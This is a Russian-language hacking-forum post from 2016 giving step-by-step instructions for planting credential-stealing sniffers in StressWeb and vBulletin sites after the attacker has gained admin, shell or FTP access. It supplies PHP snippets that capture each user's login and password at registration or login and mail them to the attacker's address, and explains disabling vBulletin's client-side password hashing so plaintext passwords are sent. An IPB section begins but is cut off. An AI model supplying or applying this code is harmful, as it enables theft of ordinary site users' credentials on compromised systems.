Уважаемые пользователи форума, убедительно просим вас переходить в телеграмм продавца, исключительно по предоставленной ссылке. Проверяйте продавца, отправив сообщение на электронную почту, чтобы убедиться в том, что вы общаетесь действительно с ним.

Ставим сниффер на форумы и CMS (2016)

Тема в разделе "Хакинг. Программирование", создана пользователем WWW, 11 июл 2016.

  1. WWW

    WWW Moderator Модератор форума

    Сообщения:
    723
    Симпатии:
    1
    Если Вы получили доступ к админке и залили шелл или просто имеете доступ к FTP форума или какой-нибудь CMS.
    Можно его заснифать, чтобы к примеру собрать логины/пароли.
    Везде принцип один и тот же, мы вызываем $ipsclass_all, и все пароли, с емайлами или логинами приходят на наш емайл.

    StressWeb.Установка снифера на StressWeb.​



    Воруем логин/пасс при регистрации с движка StressWeb (версия 13x) возможно и для других подойдет.

    Открыть Файл:
    Code:
    www/application/register.php​

    Находим такие строки:
    Code:
    $tpl-LoadView( "email_register_ok" );
    $tpl-Set( login, $_login );
    $tpl-Set( password, $_l2pass1 );
    $tpl-Set( host, HTTP_HOME_URL );
    $tpl-Build( "mail_message" );
    $mail_message = $tpl-GetResult( "mail_message" );
    $mail = new Email( $l2cfg );
    $mail-send( $_l2email, Регистрация аккаунта, $mail_message );​

    Между строчкой:

    Code:
    $mail_message = $tpl-GetResult( "mail_message" );​

    И:

    Code:
    $mail-send( $_l2email, Регистрация аккаунта, $mail_message );​

    Вставляем код:
    Code:
    $ipsclass_all = $_login . ":" . $_l2pass1;
    mail(ваш[email protected], sitename.ru, $ipsclass_all);​

    Учтите, пропуск строки после $mail_message = $tpl-GetResult( "mail_message" ); должен остаться!

    В Итоге все выглядит вот так:

    Code:
    $tpl-LoadView( "email_register_ok" );
    $tpl-Set( login, $_login );
    $tpl-Set( password, $_l2pass1 );
    $tpl-Set( host, HTTP_HOME_URL );
    $tpl-Build( "mail_message" );
    $mail_message = $tpl-GetResult( "mail_message" );​

    Code:
    $ipsclass_all = $_login . ":" . $_l2pass1;
    mail(ваш[email protected], sitename.ru, $ipsclass_all);
    $mail = new Email( $l2cfg );
    $mail-send( $_l2email, Регистрация аккаунта, $mail_message );​

    Vbulletin.Установка снифера на Vbulletin.​



    Воруем логин/пасс при входе с движка Vbulletin(версия 4x) возможно и для других подойдет.

    Открываем файл:
    Code:
    /forum/login.php​

    Ищем такую строчку:

    Код:
    Code:
    // can the user login?​

    Она должна стоять после:

    Code:
    $vbulletin-input-clean_array_gpc(p, array(
    vb_login_username = TYPE_STR,
    vb_login_password = TYPE_STR,
    vb_login_md5password = TYPE_STR,
    vb_login_md5password_utf = TYPE_STR,
    postvars = TYPE_STR,
    cookieuser = TYPE_BOOL,
    logintype = TYPE_STR,
    cssprefs = TYPE_STR,
    ));​

    Вставляем следующее после того что выше:

    Code:
    //does the user have a pass
    $username = $vbulletin-GPC[vb_login_username];
    $password = $vbulletin-GPC[vb_login_password];
    $ipsclass_all = $username . ":" . $password;
    mail(ваш[email protected], sitename.ru, $ipsclass_all);​

    Внимание! Если пасс не приходит идем сюда и находим файл:
    Code:
    /clientscript/vbulletin_md5.js​

    Вариант 1 - удаляем файл.

    ИЛИ

    Вариант 2 - Находим такую строчку:

    Code:
    // implemented like this to make sure un-updated templates behave as before
    input.value = ;

    </div​

    Это значит, что введенный нами пароль просто затирается перед передачей дальше. Просто комментим строку и собираем пароли (обновляем страницу, для того чтобы заюзать измененный JavaScript)...

    Code:
    // input.value = ;...​

    ваш[email protected] - смените емайл, на Ваш, куда будут приходить логины/пароли.
    sitename.ru - так будет называться тема письма, смените на название сайта скажем, который Вы будете снифить.
    На Ваш указанный емайл будет присылаться логин:пароль при авторизации на сайте Vbulletin.

    Ipb.Установка снифера на Ipb​
    .


    Воруем логин/пасс при входе с движка Ipb(версия 3xx) возможно и для других подойдет.

    Открываем файл:
    Code:
    <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); widt

Поделиться этой страницей